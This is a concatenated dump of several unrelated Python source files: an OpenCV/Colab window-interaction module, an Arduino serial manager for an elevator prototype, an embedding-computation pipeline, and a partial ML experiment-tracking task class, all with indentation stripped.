cv2.setMouseCallback(wnd_name, onMouse, (self,wnd_name) )
def on_capture_keys (self, wnd_name):
pass
def on_process_messages(self, sleep_time=0):
has_windows = False
has_capture_keys = False
if len(self.named_windows) != 0:
has_windows = True
if len(self.capture_keys_windows) != 0:
has_capture_keys = True
if has_windows or has_capture_keys:
wait_key_time = max(1, int(sleep_time*1000) )
ord_key = cv2.waitKeyEx(wait_key_time)
shift_pressed = False
if ord_key != -1:
chr_key = chr(ord_key) if ord_key <= 255 else chr(0)
if chr_key >= 'A' and chr_key <= 'Z':
shift_pressed = True
ord_key += 32
elif chr_key == '?':
shift_pressed = True
ord_key = ord('/')
elif chr_key == '<':
shift_pressed = True
ord_key = ord(',')
elif chr_key == '>':
shift_pressed = True
ord_key = ord('.')
else:
if sleep_time != 0:
time.sleep(sleep_time)
if has_capture_keys and ord_key != -1:
self.add_key_event ( self.focus_wnd_name, ord_key, False, False, shift_pressed)
def on_wait_any_key(self):
cv2.waitKey(0)
class InteractColab(InteractBase):
def is_support_windows(self):
return False
def is_colab(self):
return True
def on_destroy_all_windows(self):
pass
#clear_output()
def on_create_window (self, wnd_name):
pass
#clear_output()
def on_destroy_window (self, wnd_name):
pass
def on_show_image (self, wnd_name, img):
pass
# # cv2 stores colors as BGR; convert to RGB
# if img.ndim == 3:
# if img.shape[2] == 4:
# img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
# else:
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = PIL.Image.fromarray(img)
# plt.imshow(img)
# plt.show()
def on_capture_mouse (self, wnd_name):
pass
#print("on_capture_mouse(): Colab does not support")
def on_capture_keys (self, wnd_name):
pass
#print("on_capture_keys(): Colab does not support")
def on_process_messages(self, sleep_time=0):
time.sleep(sleep_time)
def on_wait_any_key(self):
pass
#print("on_wait_any_key(): Colab does not support")
if is_colab:
interact = InteractColab()
else:
interact = InteractDesktop()
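# Usage sketch (illustrative; the import path is an assumption and may differ):
#   from interact import interact as io
#   if io.input_bool("Continue?", True):
#       io.log_info("continuing...")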
|
elevator_manager.py
|
from serial.serialutil import EIGHTBITS
import serial.tools.list_ports
import serial #pyserial
from time import time, sleep
from cobs import cobs # for encoding
import threading
BAUDRATE = 9600
ARDUINO_COUNT = 2
SERVER_COUNT = 2
ELEVATOR_COUNT = 2
QUEUE_SIZE = 255
COBS_DELIMITER = b'\0' # COBS 1-byte delimiter is hex zero as a (binary) bytes character
STD_ENCODE_SIZE = 14
STD_DECODE_SIZE = 14
EID_OFFSET = 1
DOOR_OFFSET = 2
LIGHT_OFFSET = 3
FLOOR_OFFSET = 4
PID_OFFSET = 5
TEMP_OFFSET = 6
LOAD_OFFSET = 7
PERSON_OFFSET = 8
MAINTENANCE_OFFSET = 9
DIRECTION_OFFSET = 10
MOVING_OFFSET = 11
MSG_OFFSET = 12
WELCOME_MSG = "Welcome to the elevator system Prototype"
IDLE_MSG = "Elevator is in Idle State"
MOVING_MSG = "Elevator is in Moving State!"
EMERGENCY_MSG = "Elevator has entered Emergency State!"
ENERGY_SAVING_MSG = "Elevator is entering energy saving mode!"
msgs_dict = {0:WELCOME_MSG, 1:IDLE_MSG, 2:MOVING_MSG, 3:EMERGENCY_MSG, 4:ENERGY_SAVING_MSG}
class ElevatorManager:
def __init__(self):
self.initialize_containers()
self.init_elev_attrs()
#self.arduino_message_queue = Queue(maxsize = 20)
self.port_list = serial.tools.list_ports.comports(include_links=False) # searches for all computer ports
self.initialize_arduino_ports()
#self.connect_to_servers() # method for testing
def initialize_containers(self) -> None:
self.eid_list = [] # Container for unique eids
self.tid_list = [] # Container for tids.
self.serial_channel_list = []
self.aduino_thread_dict = {} # Dictionary that maps unique eids to thread ids, used to tell conflicting eids apart.
def init_elev_attrs(self) -> None:
self.eid = 0 # elevator identifier
self.door_status = 0 #
self.light_status = 0
self.current_floor = 0
self.pid = 0
self.temp = 0
self.load = 0
self.person_counter = 0
self.maintenance = 0
self.direction = 0
self.moving = 0
self.msg_to_user = 0
def initialize_arduino_ports(self) -> None:
""" Automatically detect the ports of the arduinos."""
try:
temp = [] # temporary container for ports
for port in self.port_list:
#print('Find port '+ port.device)
temp.append(port.device)
# macbook ports
self.port1 = temp[2]
self.port2 = temp[3]
self.connect_arduinos(self.port1, self.port2, BAUDRATE)
except:
print("Error detecting ports.\n")
def terminate_arduino_ports(self):
""" Closes the two ports of the arduinos."""
def connect_arduinos(self, port1: str, port2: str, baudrate: int = BAUDRATE) -> None:
""" Connect pair of arduinos."""
try:
self.arduino_serial_channel_1 = serial.Serial(port1, baudrate) # mega2560
self.arduino_serial_channel_2 = serial.Serial(port2, baudrate) # mega2560
self.assign_serial_channels(self.arduino_serial_channel_1, self.arduino_serial_channel_2)
except:
print("Error connecting to an Arduino.\n")
def assign_serial_channels(self, arduino_1:serial.Serial, arduino_2:serial.Serial) -> None:
""" This method assigns the incoming a arduino channels to a serial channel
container where it can later be used to read and write. """
try:
self.serial_channel_list.append(arduino_1)
self.serial_channel_list.append(arduino_2)
print(self.serial_channel_list)
except:
print("Cannot assign serial channels")
def connect_to_servers(self) -> None:
""" Dummy communication stablish to initially test the prototype """
self.arduino_t1 = threading.Thread(target= self.process_arduinos, args = (self.serial_channel_list[0],))
self.arduino_t2 = threading.Thread(target= self.process_arduinos, args = (self.serial_channel_list[1],))
self.arduino_t1.start()
self.arduino_t2.start()
self.arduino_t1.join()
self.arduino_t2.join()
def process_arduinos(self, arduino:serial.Serial) -> None:
""" Subroutine inside each thread that excutes the UART protocol.
MORE TO BE IMPLEMENTED. """
while(1):
current_tid = threading.current_thread().ident
print(current_tid)
self.tid_list.append(current_tid)
self.serial_service_rx(arduino)
self.request = self.initialize_cobs_pkt_list(self.eid, self.door_status, self.light_status,
self.current_floor, self.pid, self.temp, self.load, self.person_counter,
self.maintenance, self.direction, self.moving, self.msg_to_user)
self.serial_service_tx(arduino, self.request)
sleep(0.5)
def create_unique_eids(self) -> None:
self.aduino_thread_dict[0] = self.tid_list[0]
self.aduino_thread_dict[1] = self.tid_list[1]
def get_global_eid(self, global_eid:int) -> None:
""" Uses modular arithmetic to get reference a specific arduino
to a specific elevator."""
try:
number_of_bins = global_eid * (ELEVATOR_COUNT - 1) # elevator bins (2)
desired_bin = number_of_bins/ELEVATOR_COUNT # to get correct bin
desired_elevator = number_of_bins%ELEVATOR_COUNT # to get specific elevator
#print(self.aduino_thread_dict[desired_bin],desired_elevator)
except:
print("Cannot initialize four unique eid's.\n")
def initialize_cobs_pkt_list(self, *args: int) -> list:
cobs_pkt_list = []
for elevator_attr in args:
cobs_pkt_list.append(elevator_attr)
print("Cobs container:", cobs_pkt_list)
return cobs_pkt_list
def cobs_encode(self, pkt: bytes) -> bytes:
encoded_pkt = cobs.encode(pkt)
encoded_pkt += COBS_DELIMITER
return encoded_pkt
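# Illustrative example (not from the original source): COBS re-encodes the zero
# bytes inside a packet so that b'\x00' can serve as an unambiguous frame
# delimiter, e.g. cobs.encode(b'\x01\x02\x00\x03') == b'\x03\x01\x02\x02\x03',
# after which this method appends COBS_DELIMITER to terminate the frame.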
def cobs_decode(self, serial_channel:serial.Serial, pkt_size:int) -> list:
time_to_decode = 1
start = time()
byte_counter = 0
encoded_pkt = bytearray()
while time() - start < time_to_decode:
# Wait until all bytes are in pyserial rx buffer
if serial_channel.in_waiting:
# read bytes
if byte_counter<pkt_size:
bit = serial_channel.read()
byte_counter +=1
encoded_pkt+= bit
print("Encoded Byte", encoded_pkt)
if bit == b'\xff': # if frame delimiter found
decoded_pkt = list(encoded_pkt)
print(decoded_pkt)
byte_counter = 0
return decoded_pkt
def extract_pkt_data(self, pkt:list) -> None:
self.eid = pkt[EID_OFFSET]
self.door_status = pkt[DOOR_OFFSET]
self.light_status = pkt[LIGHT_OFFSET]
self.current_floor = pkt[FLOOR_OFFSET]
self.pid = pkt[PID_OFFSET]
self.temp = pkt[TEMP_OFFSET]
self.load = pkt[LOAD_OFFSET]
self.person_counter = pkt[PERSON_OFFSET]
self.maintenance = pkt[MAINTENANCE_OFFSET]
self.direction = pkt[DIRECTION_OFFSET]
self.moving = pkt[MOVING_OFFSET]
self.msg_to_user = pkt[MSG_OFFSET]
def serial_service_rx(self, serial_channel:serial.Serial) -> None:
decoded_pkt = self.cobs_decode(serial_channel, STD_DECODE_SIZE)
#testing stuff
print(decoded_pkt[EID_OFFSET])
print(decoded_pkt[DOOR_OFFSET])
print(decoded_pkt[LIGHT_OFFSET])
print(decoded_pkt[FLOOR_OFFSET])
print(decoded_pkt[PID_OFFSET])
print(decoded_pkt[TEMP_OFFSET])
print(decoded_pkt[LOAD_OFFSET])
print(decoded_pkt[PERSON_OFFSET])
print(decoded_pkt[MAINTENANCE_OFFSET])
print(decoded_pkt[DIRECTION_OFFSET])
print(decoded_pkt[MOVING_OFFSET])
print(decoded_pkt[MSG_OFFSET])
msg = decoded_pkt[MSG_OFFSET]
print(msgs_dict[msg])
self.extract_pkt_data(decoded_pkt)
def serial_service_tx(self, serial_channel:serial.Serial, pkt:list) -> None:
cobs_pkt = bytearray(pkt)
service = self.cobs_encode(cobs_pkt)
serial_channel.write(service)
serial_channel.flush()
print("Service request:",service)
def display_elevator_attr(self):
""" Return attributes of a designated elevator to display to the user. """
self.get_door_status()
self.get_light_status()
self.get_floor()
self.get_temp()
self.get_load()
return
# have to verify
def get_eid(self) -> int:
""" Return eid of a designated elevator to display to the user. """
return self.eid
def get_door_status(self) -> int:
return self.door_status
def get_light_status(self) -> int:
return self.light_status
def get_floor(self) -> int:
return self.current_floor
def get_pid(self) -> int:
return self.pid
def get_temp(self) -> int:
return self.temp
def get_load(self) -> int:
return self.load
def get_msg_to_user(self) -> int:
return self.msg_to_user
def set_eid(self, eid:int) -> None:
self.eid = eid
def set_door_status(self, door_status:int) -> None:
self.door_status = door_status
def set_light_status(self, light_status:int) -> None:
self.light_status = light_status
def set_pid(self, pid:int) -> None:
self.pid = pid
def set_floor(self, current_floor:int) -> None:
self.current_floor = current_floor
def set_temp(self, temp:int) -> None:
self.temp = temp
def set_load(self, load:int) -> None:
self.load = load
def set_msg_to_user(self, msg_to_user:int) -> None:
self.msg_to_user = msg_to_user
manager = ElevatorManager()
manager.connect_to_servers() # testing
|
pipeline.py
|
import os
import threading as th
from collections import OrderedDict as OrdD
from queue import Queue
from time import sleep
from typing import Dict, List, Optional, OrderedDict, Tuple
import numpy as np
import torch as pt
from ._logging import get_logger
from ._utils import get_tf_device
from .custom_types import CacheType, DataType, DataWithInfo, EmbeddingSlice
from .embedding import EmbeddingConfig, EmbeddingDataset, EmbeddingDatasetsTuple, PCASpec
from .reader import ReaderConfig, data_factory
from .result import Observer
from .strategy import StrategyConfig, strategy_factory
_logger = get_logger(__name__)
def _compatibility_check(train: ReaderConfig,
test: ReaderConfig,
embedding_configs: List[EmbeddingConfig]):
# Check number of embeddings
assert len(embedding_configs) > 0, "There should be at least one embedding specified!"
# Check input data same
filtered_data_types = [i for i in [train.data_type, test.data_type] if i != DataType.ANY]
num_distinct_data_types = len(set(filtered_data_types))
assert num_distinct_data_types <= 1, \
f"Data type should be same for training and test data! Found '{train.data_type.value}' for train data and " \
f"'{test.data_type.value}' for test data!"
# Check embeddings same
embeddings_types = [embedding_config.embedding_model_spec.data_type for embedding_config in embedding_configs]
filtered_embedding_types = [i for i in embeddings_types if i != DataType.ANY]
num_distinct_embedding_types = len(set(filtered_embedding_types))
assert num_distinct_embedding_types <= 1, "All embeddings should process data of the same type!"
# Check input data same as embeddings
assert num_distinct_data_types == 0 or num_distinct_embedding_types == 0 or \
filtered_data_types[0] == filtered_embedding_types[0], \
f"Specified embeddings process data of type '{filtered_embedding_types[0].value}', whereas the data is of " \
f"type '{filtered_data_types[0].value}'!"
# PCA-specific checks
# Check that there is at most one PCA transformation defined per output dimension
pca_output_dimensions = [e.embedding_model_spec.output_dimension for e in embedding_configs if
isinstance(e.embedding_model_spec, PCASpec)]
assert len(set(pca_output_dimensions)) == len(pca_output_dimensions), \
"There can be at most one PCA transformation defined per unique PCA output dimension!"
def run(train_data_config: ReaderConfig,
test_data_config: ReaderConfig,
embedding_configs: OrderedDict[str, EmbeddingConfig],
strategy_config: StrategyConfig,
observer: Observer,
device: pt.device):
# Check that data and embeddings are compatible
_compatibility_check(train_data_config, test_data_config, list(embedding_configs.values()))
# Prepare raw data
train_data_raw = data_factory(train_data_config)
test_data_raw = data_factory(test_data_config)
# Transform config Objects into EmbeddingDataset
embedding_datasets = OrdD()
for key in embedding_configs:
# PCA is a special case, it is run immediately on the CPU, strategy has only one lever pull available
# Special behaviour is needed, because the transformation depends on the whole training dataset
if isinstance(embedding_configs[key].embedding_model_spec, PCASpec):
min_batch_size = max(train_data_raw.size, test_data_raw.size)
assert embedding_configs[key].batch_size >= min_batch_size, \
f"For PCA embedding, the batch size must be large enough to fit the whole training/test set. " \
f"For the dataset specified it has to be at least {min_batch_size}!"
# Prepare embedding
train = EmbeddingDataset(train_data_raw, embedding_configs[key], CacheType.DEVICE, device)
test = EmbeddingDataset(test_data_raw, embedding_configs[key], CacheType.DEVICE, device)
# IMPORTANT: order of calls defines what is used for training and what for testing
train.prepare()
test.prepare()
else:
train = EmbeddingDataset(train_data_raw, embedding_configs[key], CacheType.NONE, device)
test = EmbeddingDataset(test_data_raw, embedding_configs[key], CacheType.DEVICE, device)
embedding_datasets[key] = EmbeddingDatasetsTuple(train=train, test=test)
# Initialize strategy
strategy = strategy_factory(strategy_config)
# Run strategy
strategy.execute(datasets=embedding_datasets, observer=observer)
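# Summary of run() above: (1) _compatibility_check validates that the train/test readers
# and all embeddings agree on data type and that PCA output dimensions are unique;
# (2) every EmbeddingConfig is wrapped into train/test EmbeddingDataset objects; PCA is a
# special case and is prepared immediately (it needs the whole training set in one batch),
# while the other embeddings are left for the strategy to drive (train uncached, test
# cached on the device); (3) the configured strategy is executed against the datasets and
# reports results through the observer.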
def store_embeddings(train_data_config: ReaderConfig,
test_data_config: ReaderConfig,
embedding_configs: OrderedDict[str, EmbeddingConfig],
output_files_path: str,
device: Optional[pt.device] = None,
filename_mapping: Dict[str, str] = None):
# Use name given to embedding as filename
if filename_mapping is None:
filename_mapping = {x: x for x in embedding_configs}
assert set(embedding_configs.keys()) == set(filename_mapping.keys()), \
f"Filename should be specified for each embedding!"
# Check that data and embeddings are compatible
_compatibility_check(train_data_config, test_data_config, list(embedding_configs.values()))
# Prepare raw data
train_data_raw = data_factory(train_data_config)
test_data_raw = data_factory(test_data_config)
# Parallel execution variables
# # Which devices will be used for execution
# # # 1. If device is specified, use only that device
if device:
num_devices = 1
available_devices = [device]
# # # 2. If device is not specified use all available GPUs
else:
num_devices = pt.cuda.device_count()
assert num_devices > 0, "There are no GPU devices available!"
available_devices = [pt.device("cuda", i) for i in range(num_devices)]
_logger.info(f"{num_devices} device(s) will be used for running inference:"
f" {', '.join(map(get_tf_device, available_devices))}")
# # Used to signal result of embedding inference to the main thread
queue = Queue()
# # One flag per device signalling whether a device is free to use
is_worker_free = [True] * num_devices
# # Counters (indices) of jobs started and finished
index_started = 0
index_finished = 0
# # Mapping that is used to signal that a device is free after a job is done executing
mapping_key_to_worker_index = {}
# # Info about embeddings
num_embeddings = len(embedding_configs)
keys_list = list(embedding_configs.keys())
# Used by job function
def job_inner(data_raw: DataWithInfo, config: EmbeddingConfig, target_device: pt.device) -> \
Tuple[np.ndarray, np.ndarray]:
ed = EmbeddingDataset(data_raw, config, CacheType.CPU, target_device)
ed.prepare()
es: EmbeddingSlice = ed.get_cache(0, ed.size, copy_to_device=False)
del ed
# Since copy_to_device is set to False and CPU cache is used, there is no need to transfer data to CPU
features = es.features.numpy()
labels = es.labels.numpy()
return features, labels
# Run inference of embedding on specified device and put result to queue
def job(key: str, config: EmbeddingConfig, target_device: pt.device):
# Uses variables defined in function: train_data_raw, test_data_raw, queue
# Training data
_logger.info(f"Computing '{key}' embeddings for train dataset on {get_tf_device(target_device)}")
train_features, train_labels = job_inner(train_data_raw, config, target_device)
# Test data
_logger.info(f"Computing '{key}' embeddings for test dataset on {get_tf_device(target_device)}")
test_features, test_labels = job_inner(test_data_raw, config, target_device)
queue.put((key, (train_features, train_labels, test_features, test_labels)))
# We are done when all jobs are finished
while index_finished < num_embeddings:
# Check whether there is a job to start or finish every second
sleep(1)
# Start new jobs if possible
while index_started < num_embeddings and True in is_worker_free:
index_free_worker = is_worker_free.index(True)
is_worker_free[index_free_worker] = False
# Get key
key_ = keys_list[index_started]
# Get device used for executing a job
job_device = available_devices[index_free_worker]
# Store worker index, so that worker can be marked as free after the job completes
mapping_key_to_worker_index[key_] = index_free_worker
# Handle PCA as a special case
if isinstance(embedding_configs[key_].embedding_model_spec, PCASpec):
min_batch_size = max(train_data_raw.size, test_data_raw.size)
assert job_device.type == "cpu", \
"PCA can only be executed on CPU! Specify device as CPU instead to ensure execution on CPU!"
assert embedding_configs[key_].batch_size >= min_batch_size, \
f"For PCA embedding, the batch size must be large enough to fit the whole training/test set. " \
f"For the dataset specified it has to be at least {min_batch_size}!"
t = th.Thread(target=job, args=(key_, embedding_configs[key_], job_device))
t.start()
# Signal that this job was launched
index_started += 1
# Handle finished jobs
while not queue.empty():
key_, data = queue.get()
# Mark worker as available
index_completed_worker = mapping_key_to_worker_index[key_]
is_worker_free[index_completed_worker] = True
# Signal that job was finished
index_finished += 1
# Store processed data
_logger.info(f"Storing '{key_}' embeddings")
np.savez(os.path.join(output_files_path, filename_mapping[key_]),
train_features=data[0],
train_labels=data[1],
test_features=data[2],
test_labels=data[3])
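# Illustrative sketch only (not part of this module's API): the dispatch pattern used by
# store_embeddings() above, reduced to a dummy workload. One boolean slot per "device",
# a Queue for results, and a polling loop; all names below are placeholders that assume
# nothing beyond the standard library.
if __name__ == "__main__":
    import threading
    from queue import Queue as _Queue
    from time import sleep as _sleep

    def _dummy_job(result_queue: _Queue, key: str) -> None:
        # Stand-in for embedding inference: just echo the key back.
        result_queue.put((key, f"result-for-{key}"))

    _keys = ["emb_a", "emb_b", "emb_c"]
    _free = [True, True]                 # two worker slots ("devices")
    _results = _Queue()
    _started = _finished = 0
    _key_to_slot = {}
    while _finished < len(_keys):
        _sleep(0.1)
        # start jobs while there is both work left and a free slot
        while _started < len(_keys) and True in _free:
            _slot = _free.index(True)
            _free[_slot] = False
            _key = _keys[_started]
            _key_to_slot[_key] = _slot
            threading.Thread(target=_dummy_job, args=(_results, _key)).start()
            _started += 1
        # drain finished jobs and release their slots
        while not _results.empty():
            _key, _value = _results.get()
            _free[_key_to_slot[_key]] = True
            _finished += 1
            print(_key, "->", _value)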
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import sys
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from pathlib2 import Path
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List
from uuid import uuid4
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir)
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from .repo.util import get_command_output
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
self._artifacts_manager = Artifacts(self)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib3 is never left in debug/info
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(task=self)
# Add backend handler to both loggers:
# 1. to the root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate, our logger will be caught by the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git diff is too large to store on the task, we must store it as an artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if config.get('development.detect_with_pip_freeze', False):
conda_requirements = ""
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ get_command_output([sys.executable, "-m", "pip", "freeze"])
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
